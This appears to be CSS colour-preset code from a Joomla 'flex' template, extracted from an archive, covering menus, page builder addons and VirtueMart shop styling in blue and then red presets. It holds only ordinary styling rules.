.sppb-addon-module.dark ul >li >span >a:hover {
  color: #7ccced;
}
.sp-module.dark ul >li >a,
.sppb-addon-module.dark ul >li >a {
  color: #4fbae7 !important;
}
.sp-module.dark ul >li >a:hover,
.sppb-addon-module.dark ul >li >a:hover {
  color: #92d5f0 !important;
}
.sp-module .latestnews >div >a,
.sppb-addon-module .latestnews >div >a {
  color: #000000;
}
.sp-module .latestnews >div >a:hover,
.sppb-addon-module .latestnews >div >a:hover {
  color: #22a9e1;
}
.sp-module ul.category-module >li >a,
.sp-module .relateditems >li >a,
.sppb-addon-module ul.category-module >li >a,
.sppb-addon-module .relateditems >li >a {
  color: #4fbae7;
}
.sp-module ul.category-module >li >a >div.related-date,
.sp-module .relateditems >li >a >div.related-date,
.sppb-addon-module ul.category-module >li >a >div.related-date,
.sppb-addon-module .relateditems >li >a >div.related-date {
  color: #999999;
}
.sp-module ul.category-module >li >a >div.related-date >i,
.sp-module .relateditems >li >a >div.related-date >i,
.sppb-addon-module ul.category-module >li >a >div.related-date >i,
.sppb-addon-module .relateditems >li >a >div.related-date >i {
  color: #7ccced;
}
.sp-module ul.category-module >li span,
.sp-module ul.category-module >li p,
.sp-module .relateditems >li span,
.sp-module .relateditems >li p,
.sppb-addon-module ul.category-module >li span,
.sppb-addon-module ul.category-module >li p,
.sppb-addon-module .relateditems >li span,
.sppb-addon-module .relateditems >li p {
  color: #999999;
}
.sp-module ul.category-module >li span >i,
.sp-module ul.category-module >li p >i,
.sp-module .relateditems >li span >i,
.sp-module .relateditems >li p >i,
.sppb-addon-module ul.category-module >li span >i,
.sppb-addon-module ul.category-module >li p >i,
.sppb-addon-module .relateditems >li span >i,
.sppb-addon-module .relateditems >li p >i {
  color: #7ccced;
}
.sp-module ul.category-module >li a.mod-articles-category-title,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title {
  color: #000000;
}
.sp-module ul.category-module >li a.mod-articles-category-title:hover,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title:hover {
  color: #22a9e1;
}
.sp-module .tagscloud .tag-name,
.sppb-addon-module .tagscloud .tag-name {
  color: #666666;
}
.sp-module .tagscloud .tag-name:hover,
.sppb-addon-module .tagscloud .tag-name:hover {
  background: #38b2e4;
  border-color: #22a9e1;
  color: #fff;
}
.tag-category ul.category li h3 >a {
  color: #595959;
}
.tag-category ul.category li h3 >a:hover {
  color: #22a9e1;
}
.tags a.label {
  background-color: rgba(45,45,45,0.45);
}
.tags a.label:hover {
  background: #38b2e4;
}
.tags >span >i {
  color: #c4c4c4;
}
.tags:hover >span >i {
  color: #919191;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a {
  color: #1a1a1a;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a:hover {
  color: #22a9e1;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a {
  color: #22a9e1;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a:hover {
  color: #22a9e1;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li span.simple-divider {
  color: #bfe6f6;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a,
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a {
  background: #22a9e1;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover,
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover {
  background: #22a9e1;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a {
  background-color: #22a9e1;
  background-color: rgba(34,169,225,0.8);
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover {
  background-color: #22a9e1;
  box-shadow: 0 1px 3px rgba(0,0,0,0.3);
}
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.fa {
  color: #22a9e1;
}
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.fa {
  color: #4fbae7;
}
input[type="text"]:focus {
  border: 1px solid #22a9e1;
}
.search input#mod-search-searchword:focus,
.search input#search-searchword:focus,
.search input#mod_virtuemart_search:focus {
  border: 1px solid #22a9e1;
}
.search:before {
  color: #4fbae7;
}
.search:hover:before,
.search:focus:before,
.search:active:before {
  color: #1a1a1a;
}
.search .btn-toolbar button {
  background: #22a9e1;
}
.post-format-masonry > i {
  background-color: #22a9e1;
  background-color: rgba(34,169,225,0.7);
}
.post-format {
  background-color: #22a9e1;
  background-color: rgba(34,169,225,0.9);
}
.entry-link,
.entry-quote {
  background-color: #22a9e1;
  background-color: rgba(34,169,225,0.9);
}
blockquote {
  border-color: #22a9e1;
}
.sp-comingsoon body {
  background-color: #1c99ce;
}
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover,
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover i {
  color: #fff;
}
.sp-comingsoon body.with-bckg-img a.logo {
  background: rgba(20,20,20,0.45);
}
.sp-comingsoon body.with-bckg-img .days .number,
.sp-comingsoon body.with-bckg-img .hours .number,
.sp-comingsoon body.with-bckg-img .seconds .number,
.sp-comingsoon body.with-bckg-img .minutes .number {
  border: 1px solid rgba(255,255,255,0.5);
  background-color: rgba(0,0,0,0.2);
}
.sp-comingsoon body.with-bckg-img .social-icons {
  background-color: rgba(0,0,0,0.2);
}
.pagination>li>a,
.pagination>li>span {
  color: #000000;
}
.pagination>li>a:hover,
.pagination>li>a:focus,
.pagination>li>span:hover,
.pagination>li>span:focus {
  color: #000000;
}
.pagination>.active>a,
.pagination>.active>span {
  border-color: #22a9e1;
  background-color: #22a9e1;
}
.pagination>.active>a:hover,
.pagination>.active>a:focus,
.pagination>.active>span:hover,
.pagination>.active>span:focus {
  border-color: #22a9e1;
  background-color: #22a9e1;
}
.sppb-addon h3.sppb-addon-title {
  color: #1a1a1a;
}
.sppb-addon h3.sppb-addon-title:after {
  background: #4fbae7;
}
.sppb-panel-default .sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-default .sppb-panel-heading.active,
.sppb-panel-default .sppb-panel-heading.active:before {
  color: #22a9e1;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title {
  color: #22a9e1;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title >i,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title >i {
  color: #4fbae7;
}
.sppb-panel-primary {
  border: none;
}
.sppb-panel-primary >.sppb-panel-heading {
  background-color: #22a9e1;
}
.sppb-panel-flex >.sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-flex >.sppb-panel-heading:after {
  color: #808080;
}
.sppb-panel-flex >.sppb-panel-heading.active {
  border-bottom: 1px solid #22a9e1;
}
.sppb-panel-flex >.sppb-panel-heading.active:after {
  color: #22a9e1;
}
.sppb-panel-flex >.sppb-panel-heading.active .sppb-panel-title >i {
  color: #22a9e1;
}
.sppb-panel-flex >.sppb-panel-heading +.sppb-panel-collapse > .sppb-panel-body {
  border-bottom: 1px solid #22a9e1;
}
.sppb-addon-countdown.flex .sppb-countdown-number {
  background-color: #22a9e1;
  border: 2px solid rgba(0,0,0,0.2);
  text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
}
.entry-header h1 a,
.entry-header h2 a {
  color: #000000;
}
.entry-header h1 a:hover,
.entry-header h1 a:focus,
.entry-header h2 a:hover,
.entry-header h2 a:focus {
  color: #22a9e1;
}
.entry-header h1:after,
.entry-header h2:after {
  background: #4fbae7;
}
.html-style span {
  background: #46b7e6;
}
ul.site-list li {
  color: #000000;
}
ul.site-list li i {
  color: #46b7e6;
}
.bullets .li-circle {
  color: #22a9e1;
}
.dropcaps .naked-drop span {
  color: #22a9e1;
}
.dropcaps .full-drop span {
  background: #22a9e1;
}
.sp-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title:after {
  background: #4fbae7;
}
.cd-pagination li.active >a {
  background-color: #22a9e1;
  color: #fff;
}
.cd-pagination a {
  background-color: #fafafa;
}
.cd-pagination a:hover,
.cd-pagination a:focus {
  background-color: #22a9e1;
  color: #fff;
}
.cd-pagination a:active {
  background-color: #13678a;
}
.sppb-addon-single-image .sppb-addon-content a .overlay >i:before {
  background-color: rgba(34,169,225,0.8);
}
.sppb-addon-single-image .sppb-addon-content a .overlay:after {
  background-color: rgba(51,51,51,0.25);
  box-shadow: inset 0 0 50px rgba(51,51,51,0.9);
}
.sppb-progress .sppb-progress-bar-default,
.sppb-progress .sppb-progress-bar.flex,
.sppb-progress .sppb-progress-bar.custom {
  background-color: #22a9e1;
}
.sppb-nav-tabs >li >a {
  color: #22a9e1;
}
.sppb-nav-tabs >li.active >a {
  color: #333333;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a {
  border-top-color: #4fbae7;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a:hover,
.flex .sppb-tab .sppb-nav-tabs >li.active >a:focus {
  border-top-color: #4fbae7;
}
.sppb-nav-modern >li >a {
  background: transparent;
  color: #333333;
}
.sppb-nav-modern >li.active >a {
  color: #22a9e1;
}
.sppb-nav-modern >li.active >a:hover,
.sppb-nav-modern >li.active >a:focus {
  color: #22a9e1;
}
.sppb-nav-lines >li >a {
  background: transparent;
}
.sppb-nav-lines >li >a >i {
  color: #666666;
}
.sppb-nav-lines >li >a:hover >i,
.sppb-nav-lines >li >a:focus >i {
  color: #333333;
}
.sppb-nav-lines >li.active >a,
.sppb-nav-lines >li.active >a:focus,
.sppb-nav-lines >li.active >a:hover {
  background-color: transparent;
  color: #22a9e1;
  border-bottom-color: #22a9e1;
}
.sppb-nav-lines >li.active >a >i,
.sppb-nav-lines >li.active >a:focus >i,
.sppb-nav-lines >li.active >a:hover >i {
  color: #22a9e1;
}
.sppb-nav-pills >li >a {
  color: #333333;
  background: transparent;
}
.sppb-nav-pills >li >a >i {
  color: #666666;
}
.sppb-nav-pills >li >a:hover >i,
.sppb-nav-pills >li >a:focus >i {
  color: #333333;
}
.sppb-nav-pills >li.active >a {
  background-color: transparent;
  color: #22a9e1;
  box-shadow: inset 0 0 0 1px #22a9e1;
}
.sppb-nav-pills >li.active >a >i {
  color: #22a9e1;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star {
  color: #4fbae7;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star-o {
  color: #c0c0c0;
}
.pro-client-url {
  color: #22a9e1;
}
.sppb-pricing-box {
  box-shadow: inset 0 0 1px #999999;
}
.sppb-pricing-box.sppb-pricing-featured {
  background: transparent;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-header {
  background-color: #22a9e1;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-features {
  color: #000000;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper,
.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper {
  position: relative;
  overflow: hidden;
  max-width: 100%;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper >a:after,
.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper >a:after {
  background: #22a9e1;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item h2.entry-title a {
  color: #404040;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner:hover h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item:hover h2.entry-title a {
  color: #22a9e1;
}
.light .sppb-selector span i {
  color: #a9ddf3;
}
.light .sppb-selector >i {
  color: #92d5f0;
}
.light .sppb-selector:hover span i {
  color: #fff;
}
.light .sppb-selector:hover i {
  color: #a9ddf3;
}
.flex .sppb-addon-content .gm-zoom-in,
.flex .sppb-addon-content .gm-zoom-out {
  background-color: #4fbae7;
  opacity: 0.77;
}
.flex .sppb-addon-content .gm-zoom-in:hover,
.flex .sppb-addon-content .gm-zoom-out:hover {
  background-color: #38b2e4;
  opacity: 1;
}
.sppb-addon .sppb-icon {
  color: #22a9e1;
  line-height: 1.5;
}
.sppb-media.default >a:hover img.sppb-media-object,
.sppb-media.flex >a:hover img.sppb-media-object {
  border-color: #22a9e1;
}
.sppb-media.default >a:hover >i,
.sppb-media.flex >a:hover >i {
  border-color: #22a9e1;
}
.sppb-media.default >.sppb-media-body >i.fa,
.sppb-media.flex >.sppb-media-body >i.fa {
  color: #a9ddf3;
}
.sppb-media footer strong {
  color: #38b2e4;
}
.sp-module .sp-module-title,
.sppb-addon-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title .divider,
.sppb-addon-module .sp-module-title .divider {
  background: #4fbae7;
}
.sp-module .divider,
.sppb-addon-module .divider {
  background: #cccccc;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #7ccced;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]:focus {
  border: 1px solid #38b2e4;
  box-shadow: 0 0 5px rgba(34,169,225,0.3);
}
.sppb-addon-ajax-contact.dark .sppb-form-group label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder] {
  color: #f0f0f0;
  border: 1px solid #999;
  border: 1px solid rgba(200,200,200,0.8);
  background: transparent;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-moz-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #58bee8;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]:focus {
  border: 1px solid #65c3ea;
}
.sppb-addon-ajax-contact.dark .tos label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .tos label a {
  color: #65c3ea;
}
.sppb-addon-ajax-contact.dark .tos label a:hover {
  color: #92d5f0;
}
.dark .acymailing_form input.inputbox {
  color: #6ec7eb;
}
.dark .acymailing_form input.inputbox:focus {
  border: 1px solid #65c3ea;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper:before {
  background-color: #7ccced !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:before {
  border: 2px solid #4fbae7 !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:after {
  background-color: #7ccced !important;
}
.error-page .error-page-inner >div.container .btn-error {
  background: #38b2e4;
}
.error-page .error-page-inner >div.container .btn-error:hover {
  background: #22a9e1;
}
.error-page .error-page-inner >div.container .fa-exclamation-triangle {
  color: #65c3ea;
}
.error-page .error-page-inner >div.container .error-code {
  color: #4fbae7;
}
.error-page .error-page-inner.with-bckg-img div.container .pe-7s-compass {
  color: #fff;
  text-shadow: 1px 3px 6px rgba(0,0,0,0.1);
}
.error-page .error-page-inner.with-bckg-img div.container .error-code {
  color: #38b2e4;
}
.sp-layer h1,
.sp-layer h2,
.sp-layer h3,
.sp-layer h4,
.sp-layer h5,
.sp-layer h6,
.sp-layer i.major_color {
  color: #38b2e4;
}
.sp-button {
  border-color: #65c3ea !important;
}
.sp-selected-button {
  background-color: #22a9e1 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation {
  color: #000000;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a {
  color: #22a9e1 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a:hover {
  color: #1678a1 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .show-cart {
  color: #fff;
}
.quantity {
  background-color: rgba(34,169,225,0.8);
}
.cd-customization .add-to-cart {
  background-color: #22a9e1;
}
.cd-customization .add-to-cart:hover {
  background-color: #1b93c5;
}
.no-touch .cd-customization .add-to-cart:hover {
  background-color: #1b93c5;
}
.productdetails-view .vm-product-details-inner .product-price .vm-price-desc+span {
  color: #22a9e1;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 {
  color: #555;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 >i {
  color: #58bee8;
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:after {
  color: #fff;
  background: rgba(85,85,85,0.3);
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:after {
  background: #22a9e1;
}
.productdetails-view .vm-product-details-inner .product-neighbours .empty-previous-page,
.productdetails-view .vm-product-details-inner .product-neighbours .empty-next-page {
  color: #fff;
  text-shadow: 1px 1px 0px rgba(85,85,85,0.08);
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.08);
}
.productdetails-view .icons a {
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.1);
}
.productdetails-view .icons a:hover {
  color: #fff;
  background: rgba(34,169,225,0.8);
}
.productdetails-view .products-desc-tab .nav-tabs >li.active >a {
  background: transparent;
  border-bottom: 1px solid #fff;
  border-right: 1px solid #e2e2e2;
  border-left: 1px solid #e2e2e2;
  box-shadow: 0 -1px 0px #22a9e1;
  border-top: 1px solid rgba(34,169,225,0.8);
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews span.date >i {
  color: #65c3ea;
}
.empty_cart >i.pe >span {
  color: #fff;
  background-color: rgba(34,169,225,0.35);
}
#fancybox-wrap #fancybox-content .continue_link,
#fancybox-wrap #fancybox-content .showcart {
  color: #fff;
  background-color: #22a9e1;
}
.cart-view input[value="Logout"],
.cart-view input[name="changeShopper"],
.cart-view input[value="Search in shop"] {
  background-color: #22a9e1;
}
.cart-view input[value="Logout"]:hover,
.cart-view input[name="changeShopper"]:hover,
.cart-view input[value="Search in shop"]:hover {
  background: #1c99ce;
}
.cart-view fieldset.userdata #com-form-login-remember input {
  background-color: #22a9e1;
}
.cart-view fieldset.userdata #com-form-login-remember input:hover {
  background-color: #1989b7;
}
.cart-view .billto-shipto a.details {
  background: #22a9e1;
}
.cart-view .billto-shipto a.details:hover {
  background: #1989b7;
}
.cart-view table.cart-summary tr th {
  background: #22a9e1;
  border: solid 1px #22a9e1;
}
.cart-view table.cart-summary input.details-button {
  background: #22a9e1;
}
.cart-view table.cart-summary .vm2-add_quantity_cart {
  background: #22a9e1;
}
.sectiontableentry1 td a.change-payment {
  color: #4fbae7;
}
.sectiontableentry1 td a.change-payment:hover {
  color: #22a9e1;
}
.vm-button-correct {
  background-color: #22a9e1;
}
.vm-button-correct:hover {
  background-color: #1c99ce;
}
.vm-button {
  background-color: #4fbae7;
}
#com-form-login-remember input.default {
  background: #22a9e1;
}
#com-form-login-remember input.default:hover {
  background: #1c99ce;
}
.control-buttons .vm-button-correct {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.control-buttons .vm-button-correct:hover,
.control-buttons .vm-button-correct:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #22a9e1;
  color: #22a9e1;
}
.control-buttons button.default {
  background: #22a9e1;
}
.control-buttons button.default:hover {
  background: #1c99ce;
}
span.userfields_info {
  color: #22a9e1;
  border-bottom: 1px solid #22a9e1;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer {
  border: 1px solid rgba(128,128,128,0.2);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .title:before {
  color: #959595;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist {
  border-left: 1px solid rgba(128,128,128,0.3);
  border-right: 1px solid rgba(128,128,128,0.3);
  background: rgba(255,255,255,0.9);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist div a {
  color: #000000;
  border-bottom: 1px solid rgba(128,128,128,0.3);
}
.sp-module-content ul.VMmenu li div > a >.nmb_products {
  color: #000000;
}
.vm-flex-search input:focus {
  border: 1px solid #22a9e1;
}
.vm-flex-search input:focus + .vm-search-button >i {
  color: #22a9e1;
}
.vm-flex-search .vm-search-button >i {
  color: #65c3ea;
}
.currency-selector-module button.btn >i,
.currency-selector-module input.btn >i {
  color: #555;
}
.currency-selector-module button.btn >i:hover,
.currency-selector-module input.btn >i:hover {
  color: #22a9e1;
}
.chzn-container-active .chzn-single {
  border: 1px solid #22a9e1 !important;
}
.chzn-container-active.chzn-with-drop .chzn-results li.highlighted {
  background: rgba(0,0,0,0.4);
}
.vm-price-box ins {
  color: #22a9e1;
}
.vm-menu .vm-title {
  border-top: 1px solid #4fbae7;
}
.vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #22a9e1;
}
header.color .vm-menu .vm-title {
  color: #262626;
  border-top: 1px solid rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li {
  box-shadow: 0 1px 0px rgba(0,0,0,0.35);
}
header.color .vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  color: #000000;
}
header.color .vm-menu ul.productdetails:last-child li {
  box-shadow: none;
}
.alert-notice {
  box-shadow: 0 0 0 1px rgba(85,85,85,0.1), 0 2px 3px rgba(85,85,85,0.07);
}
@keyframes fade-in {
  to {
    opacity: 1;
    fill: rgba(34,169,225,0.9);
    stroke-dashoffset: 0;
    stroke-width: 0;
  }
}
@keyframes flex_after_fade_default {
  to {
    opacity: 1;
    stroke-width: 0;
    stroke-dashoffset: 0;
    fill: rgba(85,85,85,0.7);
    stroke: rgba(85,85,85,0.7);
  }
}
@keyframes flex_after_f_top {
  to {
    opacity: 1;
    stroke-width: 5;
    stroke-dashoffset: 0;
    fill: rgba(34,169,225,0.85);
    stroke: #22a9e1;
  }
}
PK!k�ߠ~�~�flex/css/presets/preset7.cssnu&1i�.form-control {
  display: block;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.428571429;
  color: #555555;
  background-color: #fff;
  background-image: none;
  border: 1px solid #ccc;
  border-radius: 4px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -moz-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102,175,233,0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102,175,233,0.6);
}
.form-control::-moz-placeholder {
  color: #999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999;
}
.form-control::-webkit-input-placeholder {
  color: #999;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
  cursor: not-allowed;
  background-color: #eeeeee;
  opacity: 1;
}
textarea.form-control {
  height: auto;
}
.major_color_bckg-100 {
  background-color: #f14833;
}
.major_color_bckg-90 {
  background-color: rgba(241,72,51,0.9);
}
.major_color_bckg-80 {
  background-color: rgba(241,72,51,0.8);
}
.major_color_bckg-70 {
  background-color: rgba(241,72,51,0.7);
}
.major_color_bckg-60 {
  background-color: rgba(241,72,51,0.6);
}
.major_color_bckg-50 {
  background-color: rgba(241,72,51,0.5);
}
.major_color_bckg-40 {
  background-color: rgba(241,72,51,0.4);
}
.major_color_bckg-30 {
  background-color: rgba(241,72,51,0.3);
}
.major_color_bckg-20 {
  background-color: rgba(241,72,51,0.2);
}
.major_color_bckg-10 {
  background-color: rgba(241,72,51,0.1);
}
.black_bckg-90 {
  background-color: rgba(0,0,0,0.9);
}
.black_bckg-80 {
  background-color: rgba(0,0,0,0.8);
}
.black_bckg-70 {
  background-color: rgba(0,0,0,0.7);
}
.black_bckg-60 {
  background-color: rgba(0,0,0,0.6);
}
.black_bckg-50 {
  background-color: rgba(0,0,0,0.5);
}
.black_bckg-40 {
  background-color: rgba(0,0,0,0.4);
}
.black_bckg-30 {
  background-color: rgba(0,0,0,0.3);
}
.black_bckg-20 {
  background-color: rgba(0,0,0,0.2);
}
.black_bckg-10 {
  background-color: rgba(0,0,0,0.1);
}
.white_bckg-90 {
  background-color: rgba(255,255,255,0.9);
}
.white_bckg-80 {
  background-color: rgba(255,255,255,0.8);
}
.white_bckg-70 {
  background-color: rgba(255,255,255,0.7);
}
.white_bckg-60 {
  background-color: rgba(255,255,255,0.6);
}
.white_bckg-50 {
  background-color: rgba(255,255,255,0.5);
}
.white_bckg-40 {
  background-color: rgba(255,255,255,0.4);
}
.white_bckg-30 {
  background-color: rgba(255,255,255,0.3);
}
.white_bckg-20 {
  background-color: rgba(255,255,255,0.2);
}
.white_bckg-10 {
  background-color: rgba(255,255,255,0.1);
}
.black-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.5);
}
.black-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.4);
}
.black-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.3);
}
.black-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.2);
}
.black-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(0,0,0,0.1);
}
.white-inset-shadow-50 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.5);
}
.white-inset-shadow-40 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.4);
}
.white-inset-shadow-30 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.3);
}
.white-inset-shadow-20 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.2);
}
.white-inset-shadow-10 {
  box-shadow: inset 0 0 150px rgba(255,255,255,0.1);
}
.major_color {
  color: #f14833 !important;
}
.white_color {
  color: #fff;
}
.text_color {
  color: #000000;
}
.major_color-lighten-10 {
  color: #f47363;
}
.major_color-lighten-20 {
  color: #f89e92;
}
.major_color-lighten-30 {
  color: #fbc8c2;
}
.gray-shadow-50 {
  box-shadow: 0 0 50px rgba(85,85,85,0.5);
}
.gray-shadow-40 {
  box-shadow: 0 0 40px rgba(128,128,128,0.4);
}
.gray-shadow-30 {
  box-shadow: 0 0 30px rgba(128,128,128,0.3);
}
.gray-shadow-20 {
  box-shadow: 0 0 20px rgba(128,128,128,0.3);
}
.gray-shadow-10 {
  box-shadow: 0 0 10px rgba(128,128,128,0.3);
}
.transparent {
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent li.active a {
  color: #f14833;
  border-bottom: 2px solid #f14833;
}
#sp-header.onepage .sp-megamenu-parent li.active:first-child >a.page-scroll {
  color: #f14833;
  border-bottom: 2px solid #f14833;
}
#sp-header.onepage .sp-megamenu-parent ul li a {
  border-bottom-width: 0px !important;
  border-right: 2px solid transparent;
  border-radius: 0 !important;
}
#sp-header.onepage .sp-megamenu-parent ul li a:hover {
  color: #f14833;
  background: transparent;
}
#sp-header.onepage .sp-megamenu-parent ul li.active a {
  border-right: 2px solid #f14833;
}
#sp-header #sp-menu .sp-megamenu-parent >li.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent >li.sp-has-child.active>a {
  color: #f47363;
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.current-item.active:hover>a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item a:hover {
  color: #fff;
  background-color: #f14833;
  background-color: rgba(241,72,51,0.8);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator >a:hover {
  background: transparent !important;
  border-bottom: 1px solid rgba(0,0,0,0.15);
  box-shadow: 0 1px 0px rgba(250,250,250,0.15);
}
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a,
#sp-header #sp-menu .sp-megamenu-parent .sp-dropdown li.sp-menu-item.separator.active >a:hover {
  background: transparent;
}
#sp-header .top-search-wrapper .searchwrapper {
  box-shadow: 0 0 0 6px rgba(241,72,51,0.5);
}
#sp-header #cart-menu {
  padding: 0;
}
#sp-header #cart-menu #cd-menu-trigger .empty_basket,
#sp-header #cart-menu #cd-menu-trigger .items-added,
#sp-header #cart-menu .cd-cart .empty_basket,
#sp-header #cart-menu .cd-cart .items-added {
  background-color: #f14833;
}
#sp-header #cart-menu #cd-menu-trigger.menu-is-open >i,
#sp-header #cart-menu .cd-cart.menu-is-open >i {
  font-size: 30px;
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger >i,
#sp-header #cart-menu.shopping-menu-is-open .cd-cart >i {
  background-color: rgba(51,51,51,0.75);
}
#sp-header #cart-menu.shopping-menu-is-open #cd-menu-trigger.menu-is-open .total_products,
